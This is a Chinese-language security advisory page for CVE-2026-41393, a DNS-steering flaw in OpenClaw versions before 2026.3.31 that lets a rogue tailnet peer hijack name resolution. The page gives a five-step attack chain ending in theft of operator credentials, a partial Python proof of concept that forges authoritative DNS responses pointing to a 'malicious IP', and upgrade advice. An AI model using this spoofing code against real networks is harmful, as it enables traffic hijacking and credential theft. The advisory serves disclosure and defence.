CVE-2026-41393 CVSS 4.8 中危

CVE-2026-41393 OpenClaw DNS欺骗漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41393

漏洞类型

DNS欺骗

CVSS评分

4.8 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前的版本存在广域发现安全漏洞。该漏洞导致系统错误地将任意tailnet对等节点接受为DNS权威机构。攻击者若处于同一tailnet位置并具备CA受信任的端点访问权限，可通过DNS操纵技术劫持解析流量，从而窃取操作员凭据，造成敏感信息泄露。

技术细节

该漏洞源于OpenClaw在处理广域发现请求时的验证逻辑缺陷。系统在tailnet环境中进行服务发现时，未严格对对等节点的身份进行充分验证，便将其响应的DNS记录视为权威。攻击者利用此缺陷，在同一tailnet内部署一个恶意的DNS节点。由于攻击者拥有CA受信任的端点，其恶意节点更容易被OpenClaw接受。通过DNS操纵（DNS Steering），攻击者可以重定向特定域名的DNS查询请求到其控制的服务器。当操作员或系统组件尝试解析域名时，流量被劫持，攻击者便可捕获包含凭据的请求或响应，实现凭据窃取。CVSS向量显示需要用户交互（UI:R），暗示攻击可能需要诱导受害者触发特定的DNS查询或访问资源。

攻击链分析

STEP 1

步骤1：侦察

攻击者定位目标OpenClaw实例及其所属的tailnet网络。

STEP 2

步骤2：部署恶意节点

攻击者在同一tailnet中设置一个具备CA信任证书的恶意端点。

STEP 3

步骤3：广域发现劫持

恶意端点响应OpenClaw的广域发现请求，虚假声明自己是DNS权威机构。

STEP 4

步骤4：流量劫持

OpenClaw接受恶意节点为DNS权威，将DNS查询流量转发至攻击者控制的服务器。

STEP 5

步骤5：凭据窃取

攻击者解析并捕获DNS流量中的敏感数据，窃取操作员凭据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41393
# This script simulates a malicious peer in the tailnet claiming DNS authority.
# Note: This requires being in the same tailnet and a CA-trusted endpoint.

import socket
import struct

def craft_dns_response(transaction_id, query_name):
    """
    Crafts a malicious DNS response claiming authority for the queried domain.
    """
    # DNS Header
    flags = 0x8400  # Response, Authoritative
    questions = 1
    answer_rrs = 1
    authority_rrs = 0
    additional_rrs = 0

    header = struct.pack("!HHHHHH", transaction_id, flags, questions, answer_rrs, authority_rrs, additional_rrs)

    # Question Section (Echoing the query)
    question_parts = query_name.split('.')
    question_body = b''.join([bytes([len(part)]) + part.encode() for part in question_parts]) + b'\x00'
    question_type = struct.pack("!H", 1)  # Type A
    question_class = struct.pack("!H", 1)  # Class IN
    question = question_body + question_type + question_class

    # Answer Section (Malicious redirection)
    name = struct.pack("!H", 0xC00C)  # Pointer to query name
    type_a = struct.pack("!H", 1)
    class_in = struct.pack("!H", 1)
    ttl = struct.pack("!I", 3600)
    rdlength = struct.pack("!H", 4)  # IPv4 length
    rdata = socket.inet_aton("6.6.6.6")  # Malicious IP

    answer = name + type_a + class_in + ttl + rdlength + rdata

    return header + question + answer

# Listener loop (simplified)
# In a real exploit, this would listen on the OpenClaw discovery port.
print("Malicious DNS responder started for CVE-2026-41393...")
# print(craft_dns_response(1234, "example.openclaw.internal"))

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.3.31或更高版本。如果无法立即升级，应严格审查tailnet内的CA信任列表，移除不可信端点，并监控DNS查询日志以检测异常的重定向行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表